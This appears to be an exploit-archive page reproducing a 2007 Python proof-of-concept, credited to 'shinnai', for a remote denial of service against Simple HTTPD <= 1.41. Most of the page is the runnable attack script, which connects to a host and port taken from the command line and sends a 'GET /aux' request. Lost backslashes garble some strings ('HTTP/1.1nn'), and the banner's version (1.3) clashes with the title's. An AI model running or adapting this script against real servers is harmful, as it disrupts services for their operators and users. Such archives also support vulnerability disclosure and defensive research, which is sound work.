[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit
# Published : 2007-12-11
# Author : shinnai
# Previous Title : Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote BoF PoC
# Next Title : Cisco Phone 7940 Remote Denial of Service Exploit


#usage: poc.py host port

import socket
import sys

print "-----------------------------------------------------------------------"
print "Simple HTTPD 1.3 /aux Denial of Servicen"
print "url: http://shttpd.sourceforge.netn"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"

host = sys.argv[1]
port = long(sys.argv[2])

try:
   request =  "GET /aux HTTP/1.1nn"
   connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   connection.connect((host, port))
   connection.send(request)
except:
   print "Unable to connect. exiting."

# www.Syue.com [2007-12-11]